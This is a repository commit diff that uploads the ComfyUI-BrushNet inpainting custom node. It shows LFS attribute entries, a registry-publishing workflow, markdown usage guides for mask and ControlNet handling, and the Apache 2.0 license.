Upload 94 files

This view is limited to 50 files because it contains too many changes.

- .gitattributes +24 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/.github/workflows/publish.yml +22 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/.gitignore +8 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/BIG_IMAGE.md +6 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/CN.md +39 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/LICENSE +201 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/PARAMS.md +47 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/RAUNET.md +39 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/README.md +262 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/__init__.py +62 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/brushnet.json +58 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/brushnet.py +949 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/brushnet_ca.py +983 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/brushnet_xl.json +63 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/powerpaint.json +57 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/powerpaint_utils.py +497 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/unet_2d_blocks.py +0 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet/unet_2d_condition.py +1355 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/brushnet_nodes.py +1085 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_basic.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_basic.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_upscale.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_upscale.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_basic.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_basic.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_cut_for_inpaint.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_cut_for_inpaint.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_image_batch.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_image_batch.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_image_big_batch.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_image_big_batch.png +0 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_inpaint.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_inpaint.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_CN.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_CN.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_ELLA.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_ELLA.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_IPA.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_IPA.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_LoRA.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_LoRA.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_object_removal.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_object_removal.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_outpaint.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_outpaint.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet1.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet2.png +3 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet_basic.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet_with_CN.json +1 -0

- ComfyUI/custom_nodes/ComfyUI-BrushNet/example/goblin_toy.png +3 -0

.gitattributes

CHANGED

|

@@ -41,3 +41,27 @@ ComfyUI/custom_nodes/merge_cross_images/result3.png filter=lfs diff=lfs merge=lf

|

|

| 41 |

ComfyUI/custom_nodes/comfyui_controlnet_aux/examples/example_mesh_graphormer.png filter=lfs diff=lfs merge=lfs -text

|





| 42 |

ComfyUI/custom_nodes/comfyui_controlnet_aux/src/controlnet_aux/mesh_graphormer/hand_landmarker.task filter=lfs diff=lfs merge=lfs -text

|

| 43 |

ComfyUI/custom_nodes/ComfyUI-AutoCropFaces/images/Crop_Data.png filter=lfs diff=lfs merge=lfs -text

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|

|



|

|

|

|

|

|

|

|

|

|

|



|

|

|

|

|

|

|

|

|

| 41 |

ComfyUI/custom_nodes/comfyui_controlnet_aux/examples/example_mesh_graphormer.png filter=lfs diff=lfs merge=lfs -text

|

| 42 |

ComfyUI/custom_nodes/comfyui_controlnet_aux/src/controlnet_aux/mesh_graphormer/hand_landmarker.task filter=lfs diff=lfs merge=lfs -text

|

| 43 |

ComfyUI/custom_nodes/ComfyUI-AutoCropFaces/images/Crop_Data.png filter=lfs diff=lfs merge=lfs -text

|

| 44 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_basic.png filter=lfs diff=lfs merge=lfs -text

|

| 45 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_cut_for_inpaint.png filter=lfs diff=lfs merge=lfs -text

|

| 46 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_image_batch.png filter=lfs diff=lfs merge=lfs -text

|

| 47 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_inpaint.png filter=lfs diff=lfs merge=lfs -text

|

| 48 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_basic.png filter=lfs diff=lfs merge=lfs -text

|

| 49 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_SDXL_upscale.png filter=lfs diff=lfs merge=lfs -text

|

| 50 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_CN.png filter=lfs diff=lfs merge=lfs -text

|

| 51 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_ELLA.png filter=lfs diff=lfs merge=lfs -text

|

| 52 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_IPA.png filter=lfs diff=lfs merge=lfs -text

|

| 53 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/BrushNet_with_LoRA.png filter=lfs diff=lfs merge=lfs -text

|

| 54 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/goblin_toy.png filter=lfs diff=lfs merge=lfs -text

|

| 55 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/object_removal_fail.png filter=lfs diff=lfs merge=lfs -text

|

| 56 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/object_removal.png filter=lfs diff=lfs merge=lfs -text

|

| 57 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/params1.png filter=lfs diff=lfs merge=lfs -text

|

| 58 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/params13.png filter=lfs diff=lfs merge=lfs -text

|

| 59 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_object_removal.png filter=lfs diff=lfs merge=lfs -text

|

| 60 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/PowerPaint_outpaint.png filter=lfs diff=lfs merge=lfs -text

|

| 61 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet1.png filter=lfs diff=lfs merge=lfs -text

|

| 62 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/RAUNet2.png filter=lfs diff=lfs merge=lfs -text

|

| 63 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/sleeping_cat_inpaint1.png filter=lfs diff=lfs merge=lfs -text

|

| 64 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/sleeping_cat_inpaint3.png filter=lfs diff=lfs merge=lfs -text

|

| 65 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/sleeping_cat_inpaint5.png filter=lfs diff=lfs merge=lfs -text

|

| 66 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/sleeping_cat_inpaint6.png filter=lfs diff=lfs merge=lfs -text

|

| 67 |

+

ComfyUI/custom_nodes/ComfyUI-BrushNet/example/test_image3.png filter=lfs diff=lfs merge=lfs -text

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/.github/workflows/publish.yml

ADDED

|

@@ -0,0 +1,22 @@

|

| 1 |

+

name: Publish to Comfy registry

|

| 2 |

+

on:

|

| 3 |

+

workflow_dispatch:

|

| 4 |

+

push:

|

| 5 |

+

branches:

|

| 6 |

+

- main

|

| 7 |

+

- master

|

| 8 |

+

paths:

|

| 9 |

+

- "pyproject.toml"

|

| 10 |

+

|

| 11 |

+

jobs:

|

| 12 |

+

publish-node:

|

| 13 |

+

name: Publish Custom Node to registry

|

| 14 |

+

runs-on: ubuntu-latest

|

| 15 |

+

steps:

|

| 16 |

+

- name: Check out code

|

| 17 |

+

uses: actions/checkout@v4

|

| 18 |

+

- name: Publish Custom Node

|

| 19 |

+

uses: Comfy-Org/publish-node-action@main

|

| 20 |

+

with:

|

| 21 |

+

## Add your own personal access token to your Github Repository secrets and reference it here.

|

| 22 |

+

personal_access_token: ${{ secrets.COMFY_REGISTRY_KEY }}

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/.gitignore

ADDED

|

@@ -0,0 +1,8 @@

|

| 1 |

+

**/__pycache__/

|

| 2 |

+

.vscode/

|

| 3 |

+

*.tmp

|

| 4 |

+

*.dblite

|

| 5 |

+

*.log

|

| 6 |

+

*.part

|

| 7 |

+

|

| 8 |

+

Dockerfile

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/BIG_IMAGE.md

ADDED

|

@@ -0,0 +1,6 @@

|

| 1 |

+

|

| 2 |

+

|

| 3 |

+

[workflow](example/BrushNet_cut_for_inpaint.json)

|

| 4 |

+

|

| 5 |

+

When you work with a big image and your inpaint mask is small, it is better to cut out part of the image, work on it, and then blend it back.

|

| 6 |

+

I created a node for this kind of workflow; see the example.
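The cut, process, and blend idea described above can be sketched in a few lines of NumPy. This is only an illustration under stated assumptions, not the node's actual implementation: `mask_bbox`, `cut_process_blend`, the `pad` parameter, and the `process` callable (a stand-in for the inpainting step) are all hypothetical names.

```python
import numpy as np

def mask_bbox(mask, pad=0):
    """Return (top, bottom, left, right) around nonzero mask pixels, padded and clipped."""
    ys, xs = np.nonzero(mask)
    if ys.size == 0:
        raise ValueError("mask is empty")
    h, w = mask.shape
    top = max(int(ys.min()) - pad, 0)
    bottom = min(int(ys.max()) + 1 + pad, h)
    left = max(int(xs.min()) - pad, 0)
    right = min(int(xs.max()) + 1 + pad, w)
    return top, bottom, left, right

def cut_process_blend(image, mask, process, pad=16):
    """Cut the region around the mask, run `process` on the crop, blend it back."""
    top, bottom, left, right = mask_bbox(mask, pad)
    crop = image[top:bottom, left:right].astype(np.float32)
    crop_mask = mask[top:bottom, left:right].astype(np.float32)[..., None]
    result = process(crop)  # hypothetical stand-in for the inpainting step
    # Keep the original pixels where the mask is 0, the new pixels where it is 1.
    blended = crop_mask * result + (1.0 - crop_mask) * crop
    out = image.astype(np.float32).copy()
    out[top:bottom, left:right] = blended
    return out

# Toy data: a black 64x64 image with a small 4x4 mask.
image = np.zeros((64, 64, 3), dtype=np.float32)
mask = np.zeros((64, 64), dtype=np.float32)
mask[30:34, 40:44] = 1.0
out = cut_process_blend(image, mask, lambda c: np.ones_like(c), pad=4)
```

Only the small crop is handed to `process`, so the expensive step works on a fraction of the full image, and pixels outside the mask are left unchanged.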

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/CN.md

ADDED

|

@@ -0,0 +1,39 @@

|

| 1 |

+

## ControlNet Canny Edge

|

| 2 |

+

|

| 3 |

+

Let's take the pestered cake and try to inpaint it again. Now I would like to use a sleeping cat for it:

|

| 4 |

+

|

| 5 |

+

|

| 6 |

+

|

| 7 |

+

I use the Canny Edge node from [comfyui_controlnet_aux](https://github.com/Fannovel16/comfyui_controlnet_aux). Don't forget to resize the Canny edge mask to 512 pixels:

|

| 8 |

+

|

| 9 |

+

|

| 10 |

+

|

| 11 |

+

Let's look at the result:

|

| 12 |

+

|

| 13 |

+

|

| 14 |

+

|

| 15 |

+

The first problem I see here is some kind of object behind the cat. Such objects appear because the inpainting mask strictly aligns with the removed object, the cake in our case. To remove this artifact we should expand our mask a little:
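As a rough illustration of what expanding a mask means, here is a minimal NumPy sketch of binary dilation with a square neighbourhood. The function name `expand_mask` and its `pixels` parameter are assumptions made for this example; the workflow itself uses a mask-growing node, whose exact algorithm is not shown in the source.

```python
import numpy as np

def expand_mask(mask, pixels):
    """Grow a binary mask by `pixels` in every direction (square neighbourhood)."""
    mask = mask.astype(bool)
    h, w = mask.shape
    padded = np.pad(mask, pixels, mode="constant", constant_values=False)
    out = np.zeros_like(mask)
    # OR together every shifted copy of the mask within the neighbourhood.
    for dy in range(2 * pixels + 1):
        for dx in range(2 * pixels + 1):
            out |= padded[dy:dy + h, dx:dx + w]
    return out

# Toy data: a single masked pixel in the middle of a 9x9 image.
small = np.zeros((9, 9), dtype=bool)
small[4, 4] = True
grown = expand_mask(small, 2)
```

With `pixels=2` the single masked pixel becomes a 5x5 square, so the inpainting area now also covers a thin border around the removed object.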

|

| 16 |

+

|

| 17 |

+

|

| 18 |

+

|

| 19 |

+

Now, what's up with the cat's back and tail? Let's look at the inpainting mask and the Canny edge mask side by side:

|

| 20 |

+

|

| 21 |

+

|

| 22 |

+

|

| 23 |

+

The inpainting works (mostly) only in the masked (white) area, so we cut off the cat's back. **The ControlNet mask should be inside the inpaint mask.**
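The rule in bold can be checked numerically. The sketch below is an assumption-laden illustration, not part of the node pack: `edges_inside_mask` and `clip_edges_to_mask` are hypothetical helpers, and clipping is shown only as one possible alternative to the resizing used in this walkthrough.

```python
import numpy as np

def edges_inside_mask(edges, inpaint_mask):
    """True if every nonzero edge pixel lies in the white area of the inpaint mask."""
    return not np.any((edges > 0) & (inpaint_mask <= 0))

def clip_edges_to_mask(edges, inpaint_mask):
    """Zero out edge pixels that fall outside the inpaint mask."""
    return np.where(inpaint_mask > 0, edges, 0)

# Toy data: one edge pixel inside the mask, one outside it.
edges = np.zeros((4, 4), dtype=np.uint8)
edges[1, 1] = 1
edges[3, 3] = 1
inpaint_mask = np.zeros((4, 4), dtype=np.uint8)
inpaint_mask[0:3, 0:3] = 1

ok_before = edges_inside_mask(edges, inpaint_mask)
clipped = clip_edges_to_mask(edges, inpaint_mask)
ok_after = edges_inside_mask(clipped, inpaint_mask)
```

Clipping discards the part of the edge map that the inpainting cannot reach anyway; shrinking the edge map, as done next, keeps the whole shape instead.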

|

| 24 |

+

|

| 25 |

+

To address the issue I resized the mask to 256 pixels:

|

| 26 |

+

|

| 27 |

+

|

| 28 |

+

|

| 29 |

+

This is better but there is still room for improvement. The problem with downsampling the edge mask is that edge lines tend to break, and below a certain size we get a mess:
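Why thin edge lines break when downsampled can be shown with a toy example. The two functions below are illustrative assumptions (they are not what the resize node does internally): plain strided sampling can skip a one-pixel-wide line entirely, while max-pooling keeps a pixel whenever any source pixel in its block was set.

```python
import numpy as np

def downsample_nearest(edges, factor):
    """Keep every `factor`-th pixel; thin lines between samples are dropped."""
    return edges[::factor, ::factor]

def downsample_maxpool(edges, factor):
    """Keep a pixel if any pixel in its factor x factor block was set."""
    h, w = edges.shape
    h2, w2 = h // factor, w // factor
    blocks = edges[:h2 * factor, :w2 * factor].reshape(h2, factor, w2, factor)
    return blocks.max(axis=(1, 3))

# Toy data: a one-pixel-wide horizontal line on an odd row.
line = np.zeros((8, 8), dtype=np.uint8)
line[3, :] = 1

nearest = downsample_nearest(line, 2)
pooled = downsample_maxpool(line, 2)
```

In this extreme case the strided version loses the line completely, while the pooled version keeps it as one row of the 4x4 result. Real resampling filters fall somewhere in between, which is consistent with the partly broken edges described above.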

|

| 30 |

+

|

| 31 |

+

|

| 32 |

+

|

| 33 |

+

Look at the edge mask; at this resolution it is badly broken:

|

| 34 |

+

|

| 35 |

+

|

| 36 |

+

|

| 37 |

+

|

| 38 |

+

|

| 39 |

+

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/LICENSE

ADDED

|

@@ -0,0 +1,201 @@

|

| 1 |

+

Apache License

|

| 2 |

+

Version 2.0, January 2004

|

| 3 |

+

http://www.apache.org/licenses/

|

| 4 |

+

|

| 5 |

+

TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

|

| 6 |

+

|

| 7 |

+

1. Definitions.

|

| 8 |

+

|

| 9 |

+

"License" shall mean the terms and conditions for use, reproduction,

|

| 10 |

+

and distribution as defined by Sections 1 through 9 of this document.

|

| 11 |

+

|

| 12 |

+

"Licensor" shall mean the copyright owner or entity authorized by

|

| 13 |

+

the copyright owner that is granting the License.

|

| 14 |

+

|

| 15 |

+

"Legal Entity" shall mean the union of the acting entity and all

|

| 16 |

+

other entities that control, are controlled by, or are under common

|

| 17 |

+

control with that entity. For the purposes of this definition,

|

| 18 |

+

"control" means (i) the power, direct or indirect, to cause the

|

| 19 |

+

direction or management of such entity, whether by contract or

|

| 20 |

+

otherwise, or (ii) ownership of fifty percent (50%) or more of the

|

| 21 |

+

outstanding shares, or (iii) beneficial ownership of such entity.

|

| 22 |

+

|

| 23 |

+

"You" (or "Your") shall mean an individual or Legal Entity

|

| 24 |

+

exercising permissions granted by this License.

|

| 25 |

+

|

| 26 |

+

"Source" form shall mean the preferred form for making modifications,

|

| 27 |

+

including but not limited to software source code, documentation

|

| 28 |

+

source, and configuration files.

|

| 29 |

+

|

| 30 |

+

"Object" form shall mean any form resulting from mechanical

|

| 31 |

+

transformation or translation of a Source form, including but

|

| 32 |

+

not limited to compiled object code, generated documentation,

|

| 33 |

+

and conversions to other media types.

|

| 34 |

+

|

| 35 |

+

"Work" shall mean the work of authorship, whether in Source or

|

| 36 |

+

Object form, made available under the License, as indicated by a

|

| 37 |

+

copyright notice that is included in or attached to the work

|

| 38 |

+

(an example is provided in the Appendix below).

|

| 39 |

+

|

| 40 |

+

"Derivative Works" shall mean any work, whether in Source or Object

|

| 41 |

+

form, that is based on (or derived from) the Work and for which the

|

| 42 |

+

editorial revisions, annotations, elaborations, or other modifications

|

| 43 |

+

represent, as a whole, an original work of authorship. For the purposes

|

| 44 |

+

of this License, Derivative Works shall not include works that remain

|

| 45 |

+

separable from, or merely link (or bind by name) to the interfaces of,

|

| 46 |

+

the Work and Derivative Works thereof.

|

| 47 |

+

|

| 48 |

+

"Contribution" shall mean any work of authorship, including

|

| 49 |

+

the original version of the Work and any modifications or additions

|

| 50 |

+

to that Work or Derivative Works thereof, that is intentionally

|

| 51 |

+

submitted to Licensor for inclusion in the Work by the copyright owner

|

| 52 |

+

or by an individual or Legal Entity authorized to submit on behalf of

|

| 53 |

+

the copyright owner. For the purposes of this definition, "submitted"

|

| 54 |

+

means any form of electronic, verbal, or written communication sent

|

| 55 |

+

to the Licensor or its representatives, including but not limited to

|

| 56 |

+

communication on electronic mailing lists, source code control systems,

|

| 57 |

+

and issue tracking systems that are managed by, or on behalf of, the

|

| 58 |

+

Licensor for the purpose of discussing and improving the Work, but

|

| 59 |

+

excluding communication that is conspicuously marked or otherwise

|

| 60 |

+

designated in writing by the copyright owner as "Not a Contribution."

|

| 61 |

+

|

| 62 |

+

"Contributor" shall mean Licensor and any individual or Legal Entity

|

| 63 |

+

on behalf of whom a Contribution has been received by Licensor and

|

| 64 |

+

subsequently incorporated within the Work.

|

| 65 |

+

|

| 66 |

+

2. Grant of Copyright License. Subject to the terms and conditions of

|

| 67 |

+

this License, each Contributor hereby grants to You a perpetual,

|

| 68 |

+

worldwide, non-exclusive, no-charge, royalty-free, irrevocable

|

| 69 |

+

copyright license to reproduce, prepare Derivative Works of,

|

| 70 |

+

publicly display, publicly perform, sublicense, and distribute the

|

| 71 |

+

Work and such Derivative Works in Source or Object form.

|

| 72 |

+

|

| 73 |

+

3. Grant of Patent License. Subject to the terms and conditions of

|

| 74 |

+

this License, each Contributor hereby grants to You a perpetual,

|

| 75 |

+

worldwide, non-exclusive, no-charge, royalty-free, irrevocable

|

| 76 |

+

(except as stated in this section) patent license to make, have made,

|

| 77 |

+

use, offer to sell, sell, import, and otherwise transfer the Work,

|

| 78 |

+

where such license applies only to those patent claims licensable

|

| 79 |

+

by such Contributor that are necessarily infringed by their

|

| 80 |

+

Contribution(s) alone or by combination of their Contribution(s)

|

| 81 |

+

with the Work to which such Contribution(s) was submitted. If You

|

| 82 |

+

institute patent litigation against any entity (including a

|

| 83 |

+

cross-claim or counterclaim in a lawsuit) alleging that the Work

|

| 84 |

+

or a Contribution incorporated within the Work constitutes direct

|

| 85 |

+

or contributory patent infringement, then any patent licenses

|

| 86 |

+

granted to You under this License for that Work shall terminate

|

| 87 |

+

as of the date such litigation is filed.

|

| 88 |

+

|

| 89 |

+

4. Redistribution. You may reproduce and distribute copies of the

|

| 90 |

+

Work or Derivative Works thereof in any medium, with or without

|

| 91 |

+

modifications, and in Source or Object form, provided that You

|

| 92 |

+

meet the following conditions:

|

| 93 |

+

|

| 94 |

+

(a) You must give any other recipients of the Work or

|

| 95 |

+

Derivative Works a copy of this License; and

|

| 96 |

+

|

| 97 |

+

(b) You must cause any modified files to carry prominent notices

|

| 98 |

+

stating that You changed the files; and

|

| 99 |

+

|

| 100 |

+

(c) You must retain, in the Source form of any Derivative Works

|

| 101 |

+

that You distribute, all copyright, patent, trademark, and

|

| 102 |

+

attribution notices from the Source form of the Work,

|

| 103 |

+

excluding those notices that do not pertain to any part of

|

| 104 |

+

the Derivative Works; and

|

| 105 |

+

|

| 106 |

+

(d) If the Work includes a "NOTICE" text file as part of its

|

| 107 |

+

distribution, then any Derivative Works that You distribute must

|

| 108 |

+

include a readable copy of the attribution notices contained

|

| 109 |

+

within such NOTICE file, excluding those notices that do not

|

| 110 |

+

pertain to any part of the Derivative Works, in at least one

|

| 111 |

+

of the following places: within a NOTICE text file distributed

|

| 112 |

+

as part of the Derivative Works; within the Source form or

|

| 113 |

+

documentation, if provided along with the Derivative Works; or,

|

| 114 |

+

within a display generated by the Derivative Works, if and

|

| 115 |

+

wherever such third-party notices normally appear. The contents

|

| 116 |

+

of the NOTICE file are for informational purposes only and

|

| 117 |

+

do not modify the License. You may add Your own attribution

|

| 118 |

+

notices within Derivative Works that You distribute, alongside

|

| 119 |

+

or as an addendum to the NOTICE text from the Work, provided

|

| 120 |

+

that such additional attribution notices cannot be construed

|

| 121 |

+

as modifying the License.

|

| 122 |

+

|

| 123 |

+

You may add Your own copyright statement to Your modifications and

|

| 124 |

+

may provide additional or different license terms and conditions

|

| 125 |

+

for use, reproduction, or distribution of Your modifications, or

|

| 126 |

+

for any such Derivative Works as a whole, provided Your use,

|

| 127 |

+

reproduction, and distribution of the Work otherwise complies with

|

| 128 |

+

the conditions stated in this License.

|

| 129 |

+

|

| 130 |

+

5. Submission of Contributions. Unless You explicitly state otherwise,

|

| 131 |

+

any Contribution intentionally submitted for inclusion in the Work

|

| 132 |

+

by You to the Licensor shall be under the terms and conditions of

|

| 133 |

+

this License, without any additional terms or conditions.

|

| 134 |

+

Notwithstanding the above, nothing herein shall supersede or modify

|

| 135 |

+

the terms of any separate license agreement you may have executed

|

| 136 |

+

with Licensor regarding such Contributions.

|

| 137 |

+

|

| 138 |

+

6. Trademarks. This License does not grant permission to use the trade

|

| 139 |

+

names, trademarks, service marks, or product names of the Licensor,

|

| 140 |

+

except as required for reasonable and customary use in describing the

|

| 141 |

+

origin of the Work and reproducing the content of the NOTICE file.

|

| 142 |

+

|

| 143 |

+

7. Disclaimer of Warranty. Unless required by applicable law or

|

| 144 |

+

agreed to in writing, Licensor provides the Work (and each

|

| 145 |

+

Contributor provides its Contributions) on an "AS IS" BASIS,

|

| 146 |

+

WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or

|

| 147 |

+

implied, including, without limitation, any warranties or conditions

|

| 148 |

+

of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A

|

| 149 |

+

PARTICULAR PURPOSE. You are solely responsible for determining the

|

| 150 |

+

appropriateness of using or redistributing the Work and assume any

|

| 151 |

+

risks associated with Your exercise of permissions under this License.

|

| 152 |

+

|

| 153 |

+

8. Limitation of Liability. In no event and under no legal theory,

|

| 154 |

+

whether in tort (including negligence), contract, or otherwise,

|

| 155 |

+

unless required by applicable law (such as deliberate and grossly

|

| 156 |

+

negligent acts) or agreed to in writing, shall any Contributor be

|

| 157 |

+

liable to You for damages, including any direct, indirect, special,

|

| 158 |

+

incidental, or consequential damages of any character arising as a

|

| 159 |

+

result of this License or out of the use or inability to use the

|

| 160 |

+

Work (including but not limited to damages for loss of goodwill,

|

| 161 |

+

work stoppage, computer failure or malfunction, or any and all

|

| 162 |

+

other commercial damages or losses), even if such Contributor

|

| 163 |

+

has been advised of the possibility of such damages.

|

| 164 |

+

|

| 165 |

+

9. Accepting Warranty or Additional Liability. While redistributing

|

| 166 |

+

the Work or Derivative Works thereof, You may choose to offer,

|

| 167 |

+

and charge a fee for, acceptance of support, warranty, indemnity,

|

| 168 |

+

or other liability obligations and/or rights consistent with this

|

| 169 |

+

License. However, in accepting such obligations, You may act only

|

| 170 |

+

on Your own behalf and on Your sole responsibility, not on behalf

|

| 171 |

+

of any other Contributor, and only if You agree to indemnify,

|

| 172 |

+

defend, and hold each Contributor harmless for any liability

|

| 173 |

+

incurred by, or claims asserted against, such Contributor by reason

|

| 174 |

+

of your accepting any such warranty or additional liability.

|

| 175 |

+

|

| 176 |

+

END OF TERMS AND CONDITIONS

|

| 177 |

+

|

| 178 |

+

APPENDIX: How to apply the Apache License to your work.

|

| 179 |

+

|

| 180 |

+

To apply the Apache License to your work, attach the following

|

| 181 |

+

boilerplate notice, with the fields enclosed by brackets "[]"

|

| 182 |

+

replaced with your own identifying information. (Don't include

|

| 183 |

+

the brackets!) The text should be enclosed in the appropriate

|

| 184 |

+

comment syntax for the file format. We also recommend that a

|

| 185 |

+

file or class name and description of purpose be included on the

|

| 186 |

+

same "printed page" as the copyright notice for easier

|

| 187 |

+

identification within third-party archives.

|

| 188 |

+

|

| 189 |

+

Copyright [yyyy] [name of copyright owner]

|

| 190 |

+

|

| 191 |

+

Licensed under the Apache License, Version 2.0 (the "License");

|

| 192 |

+

you may not use this file except in compliance with the License.

|

| 193 |

+

You may obtain a copy of the License at

|

| 194 |

+

|

| 195 |

+

http://www.apache.org/licenses/LICENSE-2.0

|

| 196 |

+

|

| 197 |

+

Unless required by applicable law or agreed to in writing, software

|

| 198 |

+

distributed under the License is distributed on an "AS IS" BASIS,

|

| 199 |

+

WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

|

| 200 |

+

See the License for the specific language governing permissions and

|

| 201 |

+

limitations under the License.

|

ComfyUI/custom_nodes/ComfyUI-BrushNet/PARAMS.md

ADDED

|

@@ -0,0 +1,47 @@

|

| 1 |

+

## Start At and End At parameters usage

|

| 2 |

+

|

| 3 |

+

### start_at

|

| 4 |

+

|

| 5 |

+

Let's start with an ELLA outpaint [workflow](example/BrushNet_with_ELLA.json) and switch off the Blend Inpaint node:

|

| 6 |

+

|

| 7 |

+

|

| 8 |

+

|

| 9 |

+

For this example I use the "wargaming shop showcase" prompt, the deterministic `dpmpp_2m` sampler and the `karras` scheduler with 15 steps. This is the result:

|

| 10 |

+

|

| 11 |

+

|

| 12 |

+

|

| 13 |

+

The `start_at` BrushNet node parameter allows us to delay BrushNet inference for some steps, so the base model does all the work during those steps. Let's see what the result will be without BrushNet. For this I set the `start_at` parameter to 20 - it should be more than `steps` in the KSampler node:

|

| 14 |

+

|

| 15 |

+

|

| 16 |

+

|

| 17 |

+

So, if we apply BrushNet from the beginning (`start_at` equals 0), the resulting scene will be heavily influenced by the BrushNet image. The more we increase this parameter, the more the scene will be based on the prompt. Let's compare:

|

| 18 |

+

|

| 19 |

+

| `start_at` = 1 | `start_at` = 2 | `start_at` = 3 |

|

| 20 |

+

|:--------------:|:--------------:|:--------------:|

|

| 21 |

+

|  |  |  |

|

| 22 |

+

| `start_at` = 4 | `start_at` = 5 | `start_at` = 6 |

|

| 23 |

+

|  |  |  |

|

| 24 |

+

| `start_at` = 7 | `start_at` = 8 | `start_at` = 9 |

|

| 25 |

+

|  |  |  |

|

| 26 |

+

|

| 27 |

+

Look how the floor is aligned with the toy's base - at some step it loses consistency. The results will depend on the type of sampler and the number of KSampler steps, of course.

|

| 28 |

+

|

| 29 |

+

### end_at

|

| 30 |

+

|

| 31 |

+

